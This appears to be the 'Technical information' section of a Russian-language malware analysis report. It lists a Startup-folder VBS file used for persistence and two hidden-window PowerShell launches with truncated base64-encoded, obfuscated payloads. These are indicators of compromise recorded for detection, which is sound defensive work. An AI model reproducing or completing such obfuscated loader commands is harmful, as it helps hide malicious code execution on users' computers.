Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\start network.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwA8ACMAMAAwADAAIwA+AEEAcABwAEQAbwBtAGEAaQBuADwAIwAwADAAMAAjAD4AXQA6ADoAKAAnAD8AdQByAHIAZQBuAHQAQABvAG0AYQBpAG4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAD8AJwAsACcAQwAnACkALgByAGUAcABsAGEAYwB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwA8ACMAMAAwADAAIwA+AEEAcABwAEQAbwBtAGEAaQBuADwAIwAwADAAMAAjAD4AXQA6ADoAKAAnAD8AdQByAHIAZQBuAHQAQABvAG0AYQBpAG4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAD8AJwAsACcAQwAnACkALgByAGUAcABsAGEAYwB...